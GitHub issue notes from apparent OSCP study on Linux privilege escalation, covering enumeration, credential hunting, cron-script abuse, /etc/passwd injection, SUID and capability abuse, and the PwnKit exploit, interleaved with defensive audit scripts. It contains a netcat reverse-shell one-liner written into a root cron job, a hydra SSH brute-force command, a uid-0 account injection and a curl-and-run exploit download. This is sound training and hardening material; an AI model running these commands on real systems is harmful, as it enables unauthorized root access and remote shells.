WDavid404 / OSCP


17. Linux Privilege Escalation #18

Open WDavid404 opened 7 months ago

WDavid404 commented 7 months ago

17.1. Enumerating Linux

Manual Enumeration

joe@debian-privesc:~$ cat /etc/passwd
....
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash

Login shell: "/bin/bash" indicates the default interactive shell, if one exists. System services are configured with /usr/sbin/nologin as the login shell, where nologin blocks any remote or local login for service accounts.

hostname
cat /proc/version  (shows the gcc version)
cat /etc/issue
cat /etc/os-release
uname -a
uname -ar (kernel exploits)
routel
ss -anp
netstat -tlpn  
cat /etc/iptables/rules.v4
ls -lah /etc/cron*
cat /etc/crontab
cat /etc/cron.d 
crontab -l
sudo crontab -l
grep "CRON" /var/log/syslog
dpkg -l
dpkg -l | grep -i 'mysql' ---> shows the installed MySQL version; then use searchsploit to check whether that version has a known vuln
find / -writable -type d 2>/dev/null
cat /etc/fstab 
mount
lsblk
lsmod
/sbin/modinfo libata
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null 

cat /etc/passwd | grep bash (list of users in the system)

cat .bash_history (passwords saved in history)
env (passwords saved in environment variable)
cat /etc/*-release (kernel exploits)
sudo --version (public exploits)
id (check for docker and lxd group)
ls -la /etc/passwd (writable /etc/passwd)
ls -la /etc/shadow (writable /etc/shadow)
ps aux | grep -i "root" --color=auto

cd /home
grep -rnH "password" .

cd /var/www/
grep -rnH "password" .

find . -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|user'

https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1764384596 https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1767980521

Automated Enumeration

linpeas

# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors

unix-privesc-check tool

./unix-privesc-check standard > output.txt

Then look at the WARNING entries in output.txt.

WDavid404 commented 7 months ago

17.2. Exposed Confidential Information

17.2.1. Inspecting User Trails

env cat .bashrc

Method 1: use env to find a preset password (credential)

Interestingly, the SCRIPT_CREDENTIALS variable holds a value that resembles a password. To confirm that we are dealing with a permanent variable, we need to inspect the .bashrc configuration file.

Enter "lab" as the password in the command below to switch to the root user:

joe@debian-privesc:~$ su - root
Password:

Method 2:

kali@kali:~$ crunch 6 6 -t Lab%%% > wordlist
kali@kali:~$ hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V

17.2.2. Inspecting Service Footprints

joe@debian-privesc:~$ watch -n 1 "ps -aux | grep pass"


joe@debian-privesc:~$ sudo tcpdump -i lo -A | grep "pass"

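The two leaks shown in 17.2 (a credential sitting in an environment variable or rc file, and a password passed on a process command line) are easy to report on from the defender's side without reproducing the secret. The following is an added example, not code from the original notes: the `env` and `ps` samples are constructed, and the function names `secret_env_vars` and `secrets_in_cmdlines` are this example's own. On a real host, pipe in the output of `env`, `cat ~/.bashrc` or `ps aux` instead of the samples.

```shell
#!/bin/sh
# Added example, not part of the original notes: detection-side checks for
# secrets left in environment variables / rc files and passwords passed on
# process command lines. All sample data below is constructed.

# Constructed "env" output with a credential-bearing variable, modelled on the
# SCRIPT_CREDENTIALS variable discussed in the notes.
SAMPLE_ENV='SHELL=/bin/bash
SCRIPT_CREDENTIALS=lab
PWD=/home/joe
HOME=/home/joe
DB_TOKEN=abc123'

# Constructed, abbreviated "ps aux" lines (USER PID ... COMMAND).
SAMPLE_PS='root 1234 0.0 0.1 mysql -u root --password=Secret123 backup
joe 2345 0.0 0.0 sshpass -p hunter2 ssh eve@192.0.2.10
joe 3456 0.0 0.0 bash'

# secret_env_vars < env-or-rc-output
# Prints KEY=<redacted> for variables whose name suggests a credential. The
# value is never printed, so the report itself does not leak the secret.
# "export KEY=..." lines from .bashrc are handled as well.
secret_env_vars() {
  sed -E 's/^[[:space:]]*export[[:space:]]+//' |
  grep -Ei '^[A-Za-z_]*(passw|secret|token|cred|api_?key)[A-Za-z_]*=' |
  sed 's/=.*/=<redacted>/'
}

# secrets_in_cmdlines < ps-output
# Prints "PID FLAG" for each process whose command line carries a password via
# an option such as "--password=..." or "-p <value>". The value itself is not
# echoed. "-p" also means "port" for some tools, so treat hits as triage leads.
secrets_in_cmdlines() {
  awk '{
    for (i = 3; i <= NF; i++) {
      f = $i
      if (f ~ /^--?(pass|password|passwd|pwd|secret|token)=/) { sub(/=.*/, "", f); print $2, f }
      else if ((f == "-p" || f == "-pw" || f == "--password" || f == "--pass") && i < NF) print $2, f
    }
  }'
}

echo "== environment variables that look like credentials"
printf '%s\n' "$SAMPLE_ENV" | secret_env_vars
echo "== processes with a password on the command line"
printf '%s\n' "$SAMPLE_PS" | secrets_in_cmdlines
```

Because the report redacts values, it can be pasted into a ticket or a SIEM alert as-is; the follow-up is to move the secret into a file readable only by the service account, or into an environment file with restrictive permissions, rather than an exported variable or a command-line option that every local user can read from /proc.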
WDavid404 commented 7 months ago

17.3. Insecure File Permissions

17.3.1. Abusing Cron Jobs

We demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (/var/log/cron.log) for running cron jobs:

joe@debian-privesc:~$ grep "CRON" /var/log/syslog


The script itself is fairly straight-forward: it simply copies the user's home directory to the backups subdirectory. The permissions of the script reveal that every local user can write to the file. Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell one-liner.

joe@debian-privesc:~$ cd .scripts
joe@debian-privesc:~/.scripts$ echo >> user_backups.sh
joe@debian-privesc:~/.scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh

joe@debian-privesc:~/.scripts$ cat user_backups.sh
#!/bin/bash
cp -rf /home/joe/ /var/backups/joe/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f

This way the Kali machine receives a reverse shell running as root.

Exercise

The suspicious cron job is as follows:

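The weakness exploited in 17.3.1 is a root cron job whose script file is writable by unprivileged users. The audit below is an added example, not code from the original notes: it walks a crontab, resolves the script each job runs and reports any script that is group- or world-writable. The crontab and scripts it creates in `setup_demo` are constructed test data; the function names (`audit_crontab`, `group_or_world_writable`, `setup_demo`) are this example's own. On a real host point `audit_crontab` at /etc/crontab, each file under /etc/cron.d, or the output of `crontab -l` saved to a file.

```shell
#!/bin/sh
# Added example, not part of the original notes: audit the scripts launched by
# a crontab for the weakness abused above (a job whose script file can be
# modified by non-owners). Sample data is constructed in setup_demo.

# group_or_world_writable PATH -> exit 0 if the group or "other" write bit is
# set. Parsed from ls -l so it does not depend on GNU stat.
group_or_world_writable() {
  case "$(ls -ld "$1" | cut -c1-10)" in
    ?????w????|????????w?) return 0 ;;
  esac
  return 1
}

# audit_crontab FILE
# For every job line (comments, blank lines and VAR=value lines are skipped):
#   WRITABLE <script>   the script can be modified by non-owners
#   OK <script>         permissions are restrictive
#   MISSING <script>    the script does not exist (a dangling path is a risk too)
#   SKIP <command>      the command is not an absolute path, inspect by hand
# Handles both /etc/crontab style lines (time fields, user, command) and
# "crontab -l" style lines (time fields, command).
audit_crontab() {
  grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -Ev '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
  while read -r line; do
    set -f                       # the "*" time fields must not be glob-expanded
    set -- $line
    set +f
    shift 5                      # drop minute hour day month weekday
    case "$1" in /*) ;; *) shift ;; esac   # /etc/crontab style: skip the user field
    script=$1
    case "$script" in
      /*) if [ ! -e "$script" ]; then echo "MISSING $script"
          elif group_or_world_writable "$script"; then echo "WRITABLE $script"
          else echo "OK $script"; fi ;;
      *)  echo "SKIP $*" ;;
    esac
  done
}

# setup_demo DIR -> writes a constructed crontab plus two scripts into DIR and
# prints the crontab path. user_backups.sh is deliberately world-writable, like
# the backup script in the notes.
setup_demo() {
  printf '#!/bin/bash\ncp -rf /home/joe/ /var/backups/joe/\n' > "$1/user_backups.sh"
  chmod 777 "$1/user_backups.sh"
  printf '#!/bin/sh\necho ok\n' > "$1/good.sh"
  chmod 755 "$1/good.sh"
  printf 'SHELL=/bin/sh\n# m h dom mon dow user command\n' > "$1/crontab"
  printf '* * * * * root %s\n' "$1/user_backups.sh" >> "$1/crontab"
  printf '*/5 * * * * %s\n' "$1/good.sh" >> "$1/crontab"
  printf '0 2 * * * root /nonexistent/job.sh\n' >> "$1/crontab"
  printf '0 3 * * * root cd /tmp && ./cleanup.sh\n' >> "$1/crontab"
  echo "$1/crontab"
}

dir=$(mktemp -d)
audit_crontab "$(setup_demo "$dir")"
rm -rf "$dir"
```

The fix for a WRITABLE finding is `chmod 755` (or stricter) on the script and root ownership of both the script and its parent directory; the MISSING case matters because a root job pointing at a path under a user-writable directory lets that user supply the script.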
WDavid404 commented 7 months ago

17.3.2. Abusing Password Authentication

To escalate our privileges, let's add another superuser (root2) and the corresponding password hash to /etc/passwd. We will first generate the password hash using the openssl tool and the passwd argument. By default, if no other option is specified, openssl will generate a hash using the crypt algorithm, a supported hashing mechanism for Linux authentication.

Prerequisite: write permission on /etc/passwd


The output of the OpenSSL passwd command may vary depending on the system executing it. On older systems, it may default to the DES algorithm, while on some newer systems it could output the password in MD5 format.

joe@debian-privesc:~$ openssl passwd w00t
Fdzt.eqJQ4s0g

joe@debian-privesc:~$ echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

joe@debian-privesc:~$ su root2
Password: w00t

root@debian-privesc:/home/joe# id
uid=0(root) gid=0(root) groups=0(root)
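The /etc/passwd fields explained in 17.1 and the injected root2 entry from 17.3.2 can both be checked with one small auditor. The script below is an added example, not code from the original notes: it lists interactive accounts (the `grep bash` idea, but without missing sh, zsh or dash users), flags a second uid-0 account and a password hash stored directly in field 2, and checks the world-writable precondition. The sample passwd content is constructed and mirrors the notes' scenario; the function names `interactive_accounts`, `passwd_findings` and `passwd_is_world_writable` are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original notes: audit a file in /etc/passwd
# format for the tampering signs discussed above. Sample data is constructed;
# run the functions against the real /etc/passwd to audit a host.

# Constructed /etc/passwd sample: a normal system plus the injected "root2"
# line (a crypt hash in field 2 and uid 0) that the notes above append.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/sh
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash'

# interactive_accounts FILE
# Prints "user:shell" for every account whose login shell is not a
# nologin/false blocker (field 7).
interactive_accounts() {
  awk -F: '$7 != "" && $7 !~ /(nologin|false)$/ { print $1 ":" $7 }' "$1"
}

# passwd_findings FILE
# One line per sign of tampering:
#   EXTRA_UID0 <user>      an account other than root with uid 0 (field 3)
#   HASH_IN_PASSWD <user>  field 2 holds a hash instead of x/*/! (not shadowed)
passwd_findings() {
  awk -F: '
    $3 == "0" && $1 != "root"                        { print "EXTRA_UID0 " $1 }
    $2 != "x" && $2 != "*" && $2 != "!" && $2 != ""  { print "HASH_IN_PASSWD " $1 }
  ' "$1"
}

# passwd_is_world_writable FILE
# Exit 0 when the "other" write bit is set, the precondition for the
# /etc/passwd technique above. Parsed from ls -l so it works without GNU stat.
passwd_is_world_writable() {
  case "$(ls -ld "$1" | cut -c1-10)" in
    ????????w?) return 0 ;;
  esac
  return 1
}

# Demo run on the constructed sample, then on the real /etc/passwd if readable.
demo=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$demo"
echo "== interactive accounts"; interactive_accounts "$demo"
echo "== findings";             passwd_findings "$demo"
rm -f "$demo"
if [ -r /etc/passwd ]; then
  echo "== findings on /etc/passwd"; passwd_findings /etc/passwd
  passwd_is_world_writable /etc/passwd && echo "WARNING: /etc/passwd is world-writable"
fi
```

A HASH_IN_PASSWD hit is also the signature to look for after an incident: a legitimate account has `x` in field 2 and its hash in /etc/shadow, so a crypt hash in /etc/passwd combined with uid 0 is strong evidence of the technique shown above. Restoring the file to mode 0644 root:root closes the precondition.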
WDavid404 commented 7 months ago

17.4. Insecure System Components

17.4.1. Abusing Setuid Binaries and Capabilities


The SUID flag is depicted with the s flag in the above output. This flag can be configured using the chmod u+s command, and it sets the effective UID of the running process to the executable owner's user ID - in this case root's.

Example: the find program

joe@debian-privesc:~$ find /home/joe/Desktop -exec "/usr/bin/bash" -p \;


Another set of features subject to privilege escalation techniques are Linux capabilities. Capabilities are extra attributes that can be applied to processes, binaries, and services to assign specific privileges normally reserved for administrative operations, such as traffic capturing or adding kernel modules. Similarly to setuid binaries, if misconfigured, these capabilities could allow an attacker to elevate their privileges to root.

getcap:

joe@debian-privesc:~$ /usr/sbin/getcap -r / 2>/dev/null


The two perl binaries stand out as they have setuid capabilities enabled, along with the +ep flag specifying that these capabilities are effective and permitted.

Use the GTFOBins website (https://gtfobins.github.io/)

joe@debian-privesc:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
perl: warning: Setting locale failed.
...
# id
uid=0(root) gid=1000(joe) groups=1000(joe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)

17.4.2. Abusing Sudo

Command: sudo -l. See the "Privilege Escalation: Sudo" section at https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1764384596

Also: AppArmor is a kernel module that provides mandatory access control (MAC) on Linux systems by running various application-specific profiles, and it's enabled by default on Debian 10. We can verify AppArmor's status as the root user using the aa-status command.


This confirms that tcpdump is actively protected with a dedicated AppArmor profile, so even if tcpdump appears in our sudo -l output we cannot use it for escalation.

17.4.3. Exploiting Kernel Vulnerabilities

joe@ubuntu-privesc:~$ cat /etc/issue
Ubuntu 16.04.4 LTS \n \l

joe@ubuntu-privesc:~$ uname -r 
4.4.0-116-generic

joe@ubuntu-privesc:~$ arch 
x86_64

kali@kali:~$ searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
WDavid404 commented 7 months ago

Lab

PwnKit

PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation https://github.com/ly4k/PwnKit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Mitigation for CVE-2021-4034: a temporary mitigation is to sacrifice pkexec's functionality. By removing the SUID permission, the program can no longer run processes as root; however, any process that depends on it for normal operation will be affected. The SUID permission can be removed with chmod as follows: chmod 0755 /usr/bin/pkexec
https://www.scsk.jp/sp/sysdig/blog/container_security/cve-2021-4034_pwnkit.html
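The setuid binaries and capabilities from 17.4.1 and the pkexec mitigation from the PwnKit lab share one defensive workflow: parse the `getcap -r` output for capabilities that lead straight to uid 0, diff the live setuid list against a known-good baseline, and confirm that the `chmod 0755 /usr/bin/pkexec` mitigation actually took effect. The script below is an added example, not code from the original notes or from the PwnKit project: the getcap output and the setuid lists are constructed, and the function names `flag_dangerous_caps`, `unexpected_suid` and `has_suid_bit` are this example's own. On a real host feed it the real `getcap -r / 2>/dev/null` and `find / -perm -u=s -type f 2>/dev/null` output.

```shell
#!/bin/sh
# Added example, not part of the original notes: defender-side checks for
# capabilities, unexpected setuid binaries and the pkexec SUID mitigation.

# Constructed getcap output in the older "path = caps+flags" form; newer libcap
# prints "path caps=flags", which the parser below also accepts.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/python3.7 cap_net_bind_service=ep'

# Capabilities that hand a process a direct route to uid 0 or to the kernel.
DANGEROUS_CAPS='cap_setuid cap_setgid cap_sys_admin cap_sys_module cap_sys_ptrace cap_dac_override'

# flag_dangerous_caps < getcap-output -> "PATH CAP" for every dangerous
# capability that is in the effective (e) or permitted (p) set.
flag_dangerous_caps() {
  while read -r path second third; do
    if [ "$second" = "=" ]; then spec=$third; else spec=$second; fi
    case "$spec" in
      *+*) names=${spec%+*}; flags=${spec##*+} ;;   # old form: caps+flags
      *=*) names=${spec%=*}; flags=${spec##*=} ;;   # new form: caps=flags
      *)   continue ;;
    esac
    case "$flags" in *e*|*p*) ;; *) continue ;; esac
    for cap in $DANGEROUS_CAPS; do
      case ",$names," in *",$cap,"*) echo "$path $cap" ;; esac
    done
  done
}

# unexpected_suid FOUND_LIST BASELINE_LIST -> paths present in FOUND but not in
# BASELINE. Record BASELINE from a freshly installed, patched host of the same
# image and diff it against a live find(1) run.
unexpected_suid() {
  sort -u "$1" > "$1.sorted"; sort -u "$2" > "$2.sorted"
  comm -23 "$1.sorted" "$2.sorted"
  rm -f "$1.sorted" "$2.sorted"
}

# has_suid_bit PATH -> exit 0 if the setuid bit is set (s or S in the owner
# execute column of ls -l). Confirms the "chmod 0755 /usr/bin/pkexec" mitigation.
has_suid_bit() {
  case "$(ls -ld "$1" | cut -c1-10)" in
    ???[sS]??????) return 0 ;;
  esac
  return 1
}

echo "== dangerous capabilities"
printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
echo "== setuid binaries not in the baseline (constructed lists)"
found=$(mktemp); base=$(mktemp)
printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/pkexec /usr/bin/find > "$found"
printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/pkexec > "$base"
unexpected_suid "$found" "$base"
rm -f "$found" "$base"
if [ -e /usr/bin/pkexec ]; then
  has_suid_bit /usr/bin/pkexec && echo "pkexec is setuid: patch polkit or apply chmod 0755 /usr/bin/pkexec" || echo "pkexec has no setuid bit"
fi
```

On the constructed sample the capability check reports both perl binaries with cap_setuid, and the baseline diff reports /usr/bin/find, which matches the two misconfigurations the notes walk through. Remediation is `setcap -r` on the interpreter and `chmod u-s` on the stray binary, followed by re-running the audit; for pkexec the permanent fix is the patched polkit package, with the chmod only as the interim measure the article describes.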